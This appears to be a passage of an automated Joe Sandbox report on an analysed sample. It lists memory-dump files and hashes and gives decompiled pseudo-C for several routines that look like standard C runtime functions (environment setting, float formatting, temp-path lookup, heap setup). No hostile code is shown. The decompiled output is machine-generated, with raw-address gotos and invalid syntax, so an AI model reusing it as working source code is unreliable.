0x7ff7da8ed016
0x7ff7da8ed019
0x7ff7da8ed021
0x7ff7da8ed023
0x7ff7da8ed030
0x7ff7da8ed034
0x7ff7da8ed037
0x7ff7da8ed03c
0x7ff7da8ed041
0x7ff7da8ed045
0x7ff7da8ed04a
0x7ff7da8ed06f

Strings

gfff, xrefs: 00007FF7DA8ED172
e+000, xrefs: 00007FF7DA8ED0F5

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: 69481fe4f111be00886c661759b1faae83355af89cf0cd3651ba7caa758a580e
Instruction ID: b53d6bcd725f58f41a2ce26aeb4a6fb44fb4f73b27360e246d17bb81ea1c66c5
Opcode Fuzzy Hash: 69481fe4f111be00886c661759b1faae83355af89cf0cd3651ba7caa758a580e
Instruction Fuzzy Hash: DC515923F182C58AF7269A35980076DFB91F754B94FC88272CE984BAC2CE3ED5558710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EF958 Relevance: 2.0, APIs: 1, Instructions: 461
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00007FF77FF7DA8EF958(void* __ecx, intOrPtr __edx, void* __ebp, signed long long __rax, long long __rbx, signed long long __rcx, void* __rdx, void* __r9, signed char _a8, intOrPtr _a16, long long _a24) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t48;
				void* _t50;
				intOrPtr _t76;
				void* _t84;
				void* _t87;
				void* _t89;
				void* _t92;
				void* _t93;
				signed long long _t114;
				intOrPtr _t116;
				signed long long _t118;
				intOrPtr* _t121;
				intOrPtr* _t124;
				signed long long _t130;
				signed long long _t132;
				signed long long _t133;
				void* _t159;
				long long _t164;
				signed long long _t165;
				signed long long _t166;
				void* _t174;
				void* _t175;
				void* _t177;
				signed long long _t178;
				signed long long _t179;
				signed long long _t181;
				signed long long _t183;
				intOrPtr* _t184;
				long long _t188;

				_t123 = __rbx;
				_t114 = __rax;
				_a24 = __rbx;
				_a16 = __edx;
				_t188 = __rcx;
				if (__rcx != 0) goto 0xda8ef98c;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				goto 0xda8efc7f;
				E00007FF77FF7DA8DC4F8(__ecx, 0x3d, __rcx, __rcx, __rdx, __r9);
				_t178 = _t114;
				if (_t114 == 0) goto 0xda8efc6c;
				if (_t114 == __rcx) goto 0xda8efc6c;
				_t179 =  *0xda91c9a0; // 0x0
				_t84 = _t179 -  *0xda91c9b8; // 0x0
				bpl =  *(_t114 + 1);
				_a8 = bpl;
				if (_t84 != 0) goto 0xda8ef9d9;
				E00007FF77FF7DA8F0014(__rbx, _t179, __rcx, _t164);
				 *0xda91c9a0 = _t114;
				r12d = 1;
				if (_t114 != 0) goto 0xda8efab2;
				if (__edx == 0) goto 0xda8efa41;
				_t87 =  *0xda91c9a8 - _t164; // 0x25976dbfe10
				if (_t87 == 0) goto 0xda8efa41;
				E00007FF77FF7DA8E8468(_t179, __rcx, _t164);
				if (_t114 != 0) goto 0xda8efa1d;
				E00007FF77FF7DA8E4394(_t114);
				 *_t114 = 0x16;
				_t166 = _t165 | 0xffffffff;
				E00007FF77FF7DA8E9D68(_t114, __rcx);
				goto 0xda8efc83;
				_t181 =  *0xda91c9a0; // 0x0
				_t89 = _t181 -  *0xda91c9b8; // 0x0
				if (_t89 != 0) goto 0xda8efaa9;
				_t40 = E00007FF77FF7DA8F0014(_t123, _t181, __rcx, _t164);
				 *0xda91c9a0 = _t114;
				goto 0xda8efaa9;
				if (bpl == 0) goto 0xda8efb62;
				E00007FF77FF7DA8EDC90(_t40, _t175, __rdx);
				 *0xda91c9a0 = _t114;
				_t42 = E00007FF77FF7DA8E9D68(_t114, _t175);
				_t183 =  *0xda91c9a0; // 0x0
				if (_t183 == 0) goto 0xda8efa0a;
				_t92 =  *0xda91c9a8 - _t164; // 0x25976dbfe10
				if (_t92 != 0) goto 0xda8efaa9;
				E00007FF77FF7DA8EDC90(_t42, _t175, __rdx);
				 *0xda91c9a8 = _t114;
				E00007FF77FF7DA8E9D68(_t114, _t175);
				_t93 =  *0xda91c9a8 - _t164; // 0x25976dbfe10
				if (_t93 == 0) goto 0xda8efa0a;
				_t184 =  *0xda91c9a0; // 0x0
				if (_t184 == 0) goto 0xda8efa0a;
				_t177 = _t178 - __rcx;
				_t124 = _t184;
				if ( *_t184 == 0) goto 0xda8efaf7;
				if (E00007FF77FF7DA8F63FC(_t76, _t124, __rcx,  *_t184, _t164, _t166, _t177, __r9) != 0) goto 0xda8efae5;
				_t116 =  *_t124;
				if ( *((char*)(_t177 + _t116)) == 0x3d) goto 0xda8efaee;
				if ( *((intOrPtr*)(_t177 + _t116)) == sil) goto 0xda8efaee;
				goto 0xda8efabe;
				goto 0xda8efb01;
				_t130 =  ~((_t124 + 8 - _t184 >> 3) - _t184 >> 3);
				if (_t130 < 0) goto 0xda8efb5d;
				if ( *_t184 == _t164) goto 0xda8efb5d;
				_t46 = E00007FF77FF7DA8E9D68( *((intOrPtr*)(_t124 + 8)),  *(_t184 + _t130 * 8));
				if (bpl == 0) goto 0xda8efb2e;
				 *(_t184 + _t130 * 8) = __rcx;
				goto 0xda8efbbd;
				_t118 =  *((intOrPtr*)(_t184 + 8 + _t130 * 8));
				 *(_t184 + _t130 * 8) = _t118;
				if ( *((intOrPtr*)(_t184 + (_t130 + 1) * 8)) != _t164) goto 0xda8efb22;
				r8d = 8;
				E00007FF77FF7DA8F244C(_t46, _t130 + 1, _t184, _t130 + 1, _t164, _t166, _t177);
				_t132 = _t118;
				_t48 = E00007FF77FF7DA8E9D68(_t118, _t184);
				if (_t132 == 0) goto 0xda8efbc0;
				 *0xda91c9a0 = _t132;
				goto 0xda8efbc0;
				if (bpl != 0) goto 0xda8efb69;
				goto 0xda8efa0e;
				_t133 =  ~_t132;
				_t18 = _t133 + 2; // 0x2
				_t159 = _t18;
				if (_t159 - _t133 < 0) goto 0xda8efa0a;
				if (_t159 - 0xffffffff >= 0) goto 0xda8efa0a;
				r8d = 8;
				E00007FF77FF7DA8F244C(_t48, _t133, _t184, _t159, _t164, _t166, _t177);
				_t50 = E00007FF77FF7DA8E9D68(0xffffffff, _t184);
				if (0xffffffff == 0) goto 0xda8efa0a;
				 *((long long*)(0xffffffff + _t133 * 8)) = _t188;
				 *((long long*)(0xffffffff + 8 + _t133 * 8)) = _t164;
				 *0xda91c9a0 = 0xffffffff;
				if (_a16 == 0) goto 0xda8efc60;
				_t187 = (_t166 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t188 + (_t166 | 0xffffffff) + 1)) != sil) goto 0xda8efbd1;
				E00007FF77FF7DA8EDC90(_t50, (_t166 | 0xffffffff) + 3, _t159);
				if (0xffffffff != 0) goto 0xda8efbf9;
				E00007FF77FF7DA8E9D68(0xffffffff, (_t166 | 0xffffffff) + 3);
				goto 0xda8efc4c;
				if (E00007FF77FF7DA8E90FC(0xffffffff, 0xffffffff, _t187 + 2, _t188) != 0) goto 0xda8efc9b;
				_t28 = _t178 + 1; // 0x1
				_t121 = 0xffffffff - _t188;
				_a8 =  ~_a8;
				asm("dec eax");
				 *((intOrPtr*)(_t121 + _t178)) = sil;
				if (E00007FF77FF7DA8F6514(0, E00007FF77FF7DA8E90FC(0xffffffff, 0xffffffff, _t187 + 2, _t188), 0xffffffff, 0xffffffff, _t187 + 0x00000002 & _t28 + _t121, _t164, _t164, _t188, __r9, _t174) != 0) goto 0xda8efc58;
				E00007FF77FF7DA8E4394(_t121);
				 *_t121 = 0x2a;
				E00007FF77FF7DA8E9D68(_t121, 0xffffffff);
				E00007FF77FF7DA8E9D68(_t121, _t164);
				goto 0xda8efc83;
				E00007FF77FF7DA8E9D68(_t121, 0xffffffff);
				E00007FF77FF7DA8E9D68(_t121, _t164);
				goto 0xda8efc83;
				E00007FF77FF7DA8E4394(_t121);
				 *_t121 = 0x16;
				return E00007FF77FF7DA8E9D68(_t121, _t188);
			}

0x7ff7da8ef958
0x7ff7da8ef958
0x7ff7da8ef958
0x7ff7da8ef95d
0x7ff7da8ef974
0x7ff7da8ef97a
0x7ff7da8ef97c
0x7ff7da8ef981
0x7ff7da8ef987
0x7ff7da8ef994
0x7ff7da8ef999
0x7ff7da8ef99f
0x7ff7da8ef9a8
0x7ff7da8ef9ae
0x7ff7da8ef9b5
0x7ff7da8ef9bc
0x7ff7da8ef9c0
0x7ff7da8ef9c5
0x7ff7da8ef9ca
0x7ff7da8ef9d2
0x7ff7da8ef9d9
0x7ff7da8ef9e2
0x7ff7da8ef9ea
0x7ff7da8ef9ec
0x7ff7da8ef9f3
0x7ff7da8ef9f5
0x7ff7da8ef9fd
0x7ff7da8ef9ff
0x7ff7da8efa04
0x7ff7da8efa0a
0x7ff7da8efa11
0x7ff7da8efa18
0x7ff7da8efa1d
0x7ff7da8efa24
0x7ff7da8efa2b
0x7ff7da8efa30
0x7ff7da8efa38
0x7ff7da8efa3f
0x7ff7da8efa44
0x7ff7da8efa52
0x7ff7da8efa59
0x7ff7da8efa60
0x7ff7da8efa65
0x7ff7da8efa6f
0x7ff7da8efa71
0x7ff7da8efa78
0x7ff7da8efa82
0x7ff7da8efa89
0x7ff7da8efa90
0x7ff7da8efa95
0x7ff7da8efa9c
0x7ff7da8efaa2
0x7ff7da8efaac
0x7ff7da8efab8
0x7ff7da8efabb
0x7ff7da8efac1
0x7ff7da8efad3
0x7ff7da8efad5
0x7ff7da8efadd
0x7ff7da8efae3
0x7ff7da8efaec
0x7ff7da8efaf5
0x7ff7da8efafe
0x7ff7da8efb04
0x7ff7da8efb09
0x7ff7da8efb0f
0x7ff7da8efb17
0x7ff7da8efb19
0x7ff7da8efb1d
0x7ff7da8efb22
0x7ff7da8efb27
0x7ff7da8efb32
0x7ff7da8efb34
0x7ff7da8efb40
0x7ff7da8efb47
0x7ff7da8efb4a
0x7ff7da8efb52
0x7ff7da8efb54
0x7ff7da8efb5b
0x7ff7da8efb60
0x7ff7da8efb64
0x7ff7da8efb69
0x7ff7da8efb6c
0x7ff7da8efb6c
0x7ff7da8efb73
0x7ff7da8efb86
0x7ff7da8efb8c
0x7ff7da8efb95
0x7ff7da8efb9f
0x7ff7da8efba7
0x7ff7da8efbad
0x7ff7da8efbb1
0x7ff7da8efbb6
0x7ff7da8efbc4
0x7ff7da8efbd1
0x7ff7da8efbd8
0x7ff7da8efbe3
0x7ff7da8efbee
0x7ff7da8efbf2
0x7ff7da8efbf7
0x7ff7da8efc0a
0x7ff7da8efc13
0x7ff7da8efc17
0x7ff7da8efc1d
0x7ff7da8efc21
0x7ff7da8efc24
0x7ff7da8efc35
0x7ff7da8efc37
0x7ff7da8efc3f
0x7ff7da8efc45
0x7ff7da8efc4f
0x7ff7da8efc56
0x7ff7da8efc5b
0x7ff7da8efc63
0x7ff7da8efc6a
0x7ff7da8efc6c
0x7ff7da8efc74
0x7ff7da8efc9a

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 1d1df7195208df727aac1a32923dc7e4c26c7017fe0bf3fe916d96511d66b1a7
Instruction ID: d25cdb6b2eae66c9ea8bb0b294de3fa986dc6bc866ddab4e40d6b06d2ae44be9
Opcode Fuzzy Hash: 1d1df7195208df727aac1a32923dc7e4c26c7017fe0bf3fe916d96511d66b1a7
Instruction Fuzzy Hash: AD029221B0A653C4FA62BB11D40027DEA84BF61B94FC445B7DD5D8A2D3DE7EEA218330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8ECB54 Relevance: 1.5, Strings: 1, Instructions: 254
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E00007FF77FF7DA8ECB54(void* __rax, long long __rbx, unsigned int* __rcx, signed int* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long __r11, long long _a8, long long _a24, long long _a32, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72, long long _a80) {
				void* _v40;
				long long _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				signed int _v72;
				signed long long _v80;
				long long _v88;
				void* __rdi;
				intOrPtr _t80;
				void* _t81;
				void* _t83;
				char _t110;
				signed long long _t119;
				signed int _t120;
				void* _t137;
				char* _t156;
				unsigned long long _t168;
				char* _t182;
				char* _t183;
				intOrPtr _t184;
				signed long long _t187;
				char* _t193;
				char* _t194;
				void* _t198;
				void* _t199;
				signed int* _t202;
				signed long long _t206;
				signed long long _t209;
				void* _t212;
				char* _t214;
				void* _t215;
				signed int* _t217;
				signed int* _t226;
				signed int* _t227;
				signed int* _t228;
				signed int* _t234;
				long long _t238;
				intOrPtr* _t240;
				unsigned int* _t241;
				void* _t242;

				_t238 = __r11;
				_t224 = __r8;
				_t219 = __rbp;
				_t213 = __rsi;
				_t202 = __rdx;
				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				r11d = 0;
				 *__rdx = r11b;
				_t119 =  >=  ? _a48 : r11d;
				_t182 = __rdx;
				_t241 = __rcx;
				_t5 = _t212 + 0xb; // 0xb
				if (__r8 - _t5 > 0) goto 0xda8ecbcc;
				_t187 = _a80;
				_t7 = _t238 + 0x22; // 0x22
				_v80 = _t187;
				r9d = 0;
				r8d = 0;
				_v88 = __r11;
				 *((char*)(_t187 + 0x30)) = 1;
				 *((intOrPtr*)(_t187 + 0x2c)) = _t7;
				E00007FF77FF7DA8E9C34(__rax, __rdx, _t187, __rdx, __rsi, __rbp, __r8);
				goto 0xda8ececd;
				if (( *_t187 >> 0x00000034 & _t187) != _t187) goto 0xda8ecc65;
				_t231 = __r9;
				_v48 = _a80;
				_v56 = _a72;
				_v64 = _a64;
				_t156 = _a40;
				_v72 = r11b;
				_v80 = _t119;
				_v88 = _t156;
				if (E00007FF77FF7DA8ECEEC(_t182, _t241, _t202, _t212, _t213, _t224, __r9) == 0) goto 0xda8ecc34;
				 *_t182 = 0;
				goto 0xda8ececd;
				E00007FF77FF7DA8DC578(_t73, _t7, 0x65, _t156, _t182, _t182, _t231);
				if (_t156 == 0) goto 0xda8ececb;
				 *_t156 = ((_a56 ^ 0x00000001) << 5) + 0x50;
				 *((char*)(_t156 + 3)) = 0;
				goto 0xda8ececb;
				if ( *_t241 - _t238 >= 0) goto 0xda8ecc74;
				 *_t202 = 0x2d;
				_t183 = _t182 + 1;
				_t240 = _t183 + 1;
				r15d = 0x3ff;
				r13d = (_a56 ^ 0x00000001) & 0x000000ff;
				r8d = 0x30;
				if (( *_t241 & 0x00000000) != 0) goto 0xda8ecccb;
				 *_t183 = r8b;
				asm("dec ebp");
				r15d = r15d & 0x000003fe;
				goto 0xda8eccce;
				 *_t183 = 0x31;
				_t214 = _t240 + 1;
				if (_t119 != 0) goto 0xda8eccdc;
				goto 0xda8ecd13;
				_t184 = _a80;
				if ( *((intOrPtr*)(_t184 + 0x28)) != r11b) goto 0xda8ecd03;
				E00007FF77FF7DA8E3970( ~( *_t241 & 0xffffffff), _t184, _t184, _t214);
				r11d = 0;
				_t31 = _t238 + 0x30; // 0x30
				r8d = _t31;
				_t80 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x18)) + 0xf8))))));
				 *_t240 = _t80;
				if (( *_t241 & 0xffffffff) <= 0) goto 0xda8ecdaa;
				if (_t119 <= 0) goto 0xda8ecd61;
				_t81 = _t80 + r8w;
				_t137 = _t81 - 0x39;
				if (_t137 <= 0) goto 0xda8ecd4e;
				 *_t214 = _t81 + (r13d << 5) + 7;
				_t120 = _t119 - 1;
				_t215 = _t214 + 1;
				if (_t137 >= 0) goto 0xda8ecd2e;
				goto 0xda8ecdaa;
				r9d = _a72;
				r8d = r8w & 0xffff;
				_t83 = E00007FF77FF7DA8ED550(_t81 + (r13d << 5) + 7, _t7, _t184, _t241, 0 >> 4, _t212, _t215, _t219);
				r11d = 0;
				if (_t83 == 0) goto 0xda8ecdcb;
				_t193 = _t215 - 1;
				_t110 =  *_t193;
				if (0x47 != 0) goto 0xda8ecd94;
				 *_t193 = 0x30;
				_t194 = _t193 - 1;
				goto 0xda8ecd83;
				if (_t194 == _t240) goto 0xda8ecda7;
				if (_t110 != 0x39) goto 0xda8ecda1;
				 *_t194 = _t110 + bpl + 1;
				goto 0xda8ecdaa;
				 *((char*)(_t194 - 1)) =  *((char*)(_t194 - 1)) + 1;
				if (_t120 <= 0) goto 0xda8ecdcb;
				r8d = _t120;
				E00007FF77FF7DA8DC170();
				r11d = 0;
				goto 0xda8ecdd0;
				_t217 =  ==  ? _t240 : _t215 + _t184;
				r13b = r13b << 5;
				r13b = r13b + 0x50;
				 *_t217 = r13b;
				_t234 =  &(_t217[0]);
				_t168 =  *_t241 >> 0x34;
				if ( *_t240 - r11b >= 0) goto 0xda8ece03;
				_t198 = _t242 - _t168;
				_t44 = _t168 + 2; // 0x2d
				_t87 =  <  ? _t44 : 0x2b;
				_t217[0] =  <  ? _t44 : 0x2b;
				 *_t234 = dil;
				if (_t198 - 0x3e8 < 0) goto 0xda8ece57;
				_t226 =  &(_t234[0]);
				_t206 = (_t215 - _t242 >> 7) + (_t215 - _t242 >> 7 >> 0x3f);
				 *_t234 = _t212 + _t206;
				_t199 = _t198 + _t206 * 0xfffffc18;
				if (_t226 != _t234) goto 0xda8ece5d;
				if (_t199 - 0x64 < 0) goto 0xda8ece90;
				_t209 = (_t206 + _t199 >> 6) + (_t206 + _t199 >> 6 >> 0x3f);
				 *_t226 = _t212 + _t209;
				_t227 =  &(_t226[0]);
				if (_t227 != _t234) goto 0xda8ece96;
				if (_t199 + _t209 * 0xffffff9c - 0xa < 0) goto 0xda8ecec1;
				 *_t227 = _t212 + (_t209 >> 2) + (_t209 >> 2 >> 0x3f);
				_t228 =  &(_t227[0]);
				 *_t228 = 0x367 + dil;
				_t228[0] = r11b;
				return 0;
			}

0x7ff7da8ecb54
0x7ff7da8ecb54
0x7ff7da8ecb54
0x7ff7da8ecb54
0x7ff7da8ecb54
0x7ff7da8ecb54
0x7ff7da8ecb59
0x7ff7da8ecb5e
0x7ff7da8ecb77
0x7ff7da8ecb7c
0x7ff7da8ecb85
0x7ff7da8ecb88
0x7ff7da8ecb8b
0x7ff7da8ecb8e
0x7ff7da8ecb97
0x7ff7da8ecb99
0x7ff7da8ecba1
0x7ff7da8ecba5
0x7ff7da8ecbaa
0x7ff7da8ecbad
0x7ff7da8ecbb0
0x7ff7da8ecbb7
0x7ff7da8ecbbb
0x7ff7da8ecbc0
0x7ff7da8ecbc7
0x7ff7da8ecbde
0x7ff7da8ecbec
0x7ff7da8ecbef
0x7ff7da8ecbfe
0x7ff7da8ecc09
0x7ff7da8ecc0d
0x7ff7da8ecc15
0x7ff7da8ecc1a
0x7ff7da8ecc1e
0x7ff7da8ecc2a
0x7ff7da8ecc2c
0x7ff7da8ecc2f
0x7ff7da8ecc3c
0x7ff7da8ecc44
0x7ff7da8ecc5a
0x7ff7da8ecc5c
0x7ff7da8ecc60
0x7ff7da8ecc6d
0x7ff7da8ecc6f
0x7ff7da8ecc71
0x7ff7da8ecc7b
0x7ff7da8ecc81
0x7ff7da8ecc87
0x7ff7da8ecc8b
0x7ff7da8eccb1
0x7ff7da8eccb3
0x7ff7da8eccbf
0x7ff7da8eccc2
0x7ff7da8eccc9
0x7ff7da8ecccb
0x7ff7da8eccce
0x7ff7da8eccd5
0x7ff7da8eccda
0x7ff7da8eccdc
0x7ff7da8ecce8
0x7ff7da8ecced
0x7ff7da8eccf2
0x7ff7da8eccff
0x7ff7da8eccff
0x7ff7da8ecd11
0x7ff7da8ecd13
0x7ff7da8ecd1a
0x7ff7da8ecd33
0x7ff7da8ecd41
0x7ff7da8ecd45
0x7ff7da8ecd49
0x7ff7da8ecd4e
0x7ff7da8ecd50
0x7ff7da8ecd52
0x7ff7da8ecd5d
0x7ff7da8ecd5f
0x7ff7da8ecd61
0x7ff7da8ecd69
0x7ff7da8ecd73
0x7ff7da8ecd78
0x7ff7da8ecd7d
0x7ff7da8ecd7f
0x7ff7da8ecd83
0x7ff7da8ecd8a
0x7ff7da8ecd8c
0x7ff7da8ecd8f
0x7ff7da8ecd92
0x7ff7da8ecd97
0x7ff7da8ecd9c
0x7ff7da8ecda3
0x7ff7da8ecda5
0x7ff7da8ecda7
0x7ff7da8ecdac
0x7ff7da8ecdae
0x7ff7da8ecdbe
0x7ff7da8ecdc6
0x7ff7da8ecdc9
0x7ff7da8ecdd4
0x7ff7da8ecdd8
0x7ff7da8ecddc
0x7ff7da8ecde0
0x7ff7da8ecde3
0x7ff7da8ecdea
0x7ff7da8ecdfb
0x7ff7da8ece00
0x7ff7da8ece0e
0x7ff7da8ece11
0x7ff7da8ece14
0x7ff7da8ece17
0x7ff7da8ece21
0x7ff7da8ece2d
0x7ff7da8ece3f
0x7ff7da8ece45
0x7ff7da8ece4f
0x7ff7da8ece55
0x7ff7da8ece5b
0x7ff7da8ece78
0x7ff7da8ece7e
0x7ff7da8ece81
0x7ff7da8ece8e
0x7ff7da8ece94
0x7ff7da8eceb4
0x7ff7da8eceb7
0x7ff7da8ecec4
0x7ff7da8ecec7
0x7ff7da8eceea

Strings

gfffffff, xrefs: 00007FF7DA8ECE96

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: cf9e926bd06e6296f4aba0f07622bacccd0840f3ce88d9759f2d176c501fd3f5
Instruction ID: 24f9bc7b72fdf4e1bfa30bb705795effdb9d1efe5f076c3777cbce4eec9fba03
Opcode Fuzzy Hash: cf9e926bd06e6296f4aba0f07622bacccd0840f3ce88d9759f2d176c501fd3f5
Instruction Fuzzy Hash: AEA137A3F087C686FB22DB2590007ADBB91FB61B84F848172DE4D47786DA3ED621C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E6EE8 Relevance: 1.4, Strings: 1, Instructions: 177
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E00007FF77FF7DA8E6EE8(long long __rbx, void* __rcx, void* __rdx, long long __rsi) {
				void* _t14;
				void* _t22;
				intOrPtr* _t53;
				signed long long _t55;
				void* _t72;
				long long _t85;
				intOrPtr* _t89;
				void* _t93;
				void* _t94;
				long long _t96;
				signed long long _t98;
				signed long long _t99;
				void* _t101;

				_t71 = __rdx;
				_t53 = _t89;
				 *((long long*)(_t53 + 0x10)) = __rbx;
				 *((long long*)(_t53 + 0x18)) = _t85;
				 *((long long*)(_t53 + 0x20)) = __rsi;
				_t94 = __rdx;
				r13d = 0;
				 *((long long*)(_t53 + 8)) = _t96;
				_t14 = E00007FF77FF7DA8F05E8();
				if (_t14 == 0) goto 0xda8e6f35;
				if (_t14 == 0x16) goto 0xda8e70f1;
				goto 0xda8e6f8a;
				if ( *((intOrPtr*)(_t89 - 0x30 + 0x60)) == 0) goto 0xda8e6f8a;
				if (E00007FF77FF7DA8F0688(0,  *((intOrPtr*)(_t89 - 0x30 + 0x60))) != 0) goto 0xda8e6f58;
				_t58 = _t96;
				goto 0xda8e6fc1;
				E00007FF77FF7DA8E7210(_t96, _t96, __rdx,  *((intOrPtr*)(_t89 - 0x30 + 0x60)), _t101);
				if (_t53 == 0) goto 0xda8e6f82;
				if (E00007FF77FF7DA8F0688(0, _t53) != 0) goto 0xda8e6f82;
				E00007FF77FF7DA8E9D68(_t53, _t53);
				goto 0xda8e6fc1;
				E00007FF77FF7DA8E9D68(_t53, _t53);
				if (_t53 == 0) goto 0xda8e6fa2;
				if (E00007FF77FF7DA8F0688(0, _t53) != 0) goto 0xda8e6fa2;
				goto 0xda8e6fbe;
				if (E00007FF77FF7DA8F0688(0, 0xda901824) == 0) goto 0xda8e6fbe;
				_t22 = E00007FF77FF7DA8E9D68(_t53, _t96);
				_t99 = _t98 | 0xffffffff;
				if (_t94 == 0) goto 0xda8e6fe1;
				if ( *((intOrPtr*)(_t94 + (_t99 + 1) * 2)) != r13w) goto 0xda8e6fd5;
				goto 0xda8e6fe4;
				_t55 = _t99 + 1;
				if ( *((intOrPtr*)(0xda901828 + _t55 * 2)) != r13w) goto 0xda8e6fe7;
				r15d = _t22 + 0xc + r13d;
				0xda8e3fe4(_t98, _t96, _t93, _t72);
				if (_t55 != 0) goto 0xda8e703b;
				E00007FF77FF7DA8E3FEC(0, _t58, _t71, 0xda901830);
				E00007FF77FF7DA8E9D68(_t55, _t96);
				return 0;
			}

0x7ff7da8e6ee8
0x7ff7da8e6ee8
0x7ff7da8e6eeb
0x7ff7da8e6eef
0x7ff7da8e6ef3
0x7ff7da8e6f04
0x7ff7da8e6f11
0x7ff7da8e6f16
0x7ff7da8e6f1e
0x7ff7da8e6f25
0x7ff7da8e6f2a
0x7ff7da8e6f33
0x7ff7da8e6f3d
0x7ff7da8e6f4b
0x7ff7da8e6f53
0x7ff7da8e6f56
0x7ff7da8e6f5b
0x7ff7da8e6f66
0x7ff7da8e6f74
0x7ff7da8e6f78
0x7ff7da8e6f80
0x7ff7da8e6f85
0x7ff7da8e6f8d
0x7ff7da8e6f9b
0x7ff7da8e6fa0
0x7ff7da8e6fb5
0x7ff7da8e6fc4
0x7ff7da8e6fc9
0x7ff7da8e6fd0
0x7ff7da8e6fdd
0x7ff7da8e6fdf
0x7ff7da8e6fe7
0x7ff7da8e6fef
0x7ff7da8e6ffd
0x7ff7da8e7000
0x7ff7da8e700b
0x7ff7da8e700f
0x7ff7da8e7017
0x7ff7da8e703a

Strings

TMP, xrefs: 00007FF7DA8E6F07

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: b5b4597b7c80bc31c69463ab0a6847a9373f2e92ff0dbf9e1fc0b4f4a9174bad
Instruction ID: dccbe99af7585d4600868362170303d013f0b5d4d9857afcd4e395866832b479
Opcode Fuzzy Hash: b5b4597b7c80bc31c69463ab0a6847a9373f2e92ff0dbf9e1fc0b4f4a9174bad
Instruction Fuzzy Hash: 2B51B411F0875381FA66BB26590157EE690BFA4BC4FD848B6DD0E477C7EE3EE6218210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F24F0 Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8F24F0(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xda91d260 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}

0x7ff7da8f24f4
0x7ff7da8f24fd
0x7ff7da8f250b

APIs

